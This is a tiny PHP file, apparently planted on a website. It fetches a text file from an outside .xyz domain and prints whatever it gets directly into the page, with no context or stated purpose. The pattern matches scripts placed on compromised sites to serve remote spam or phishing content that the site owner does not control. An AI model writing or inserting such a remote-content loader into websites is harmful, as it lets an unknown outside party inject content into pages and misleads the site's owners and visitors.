<?php
$a = file_get_contents('https://kelazsenang.xyz/bcpbn.txt');
echo $a;
?>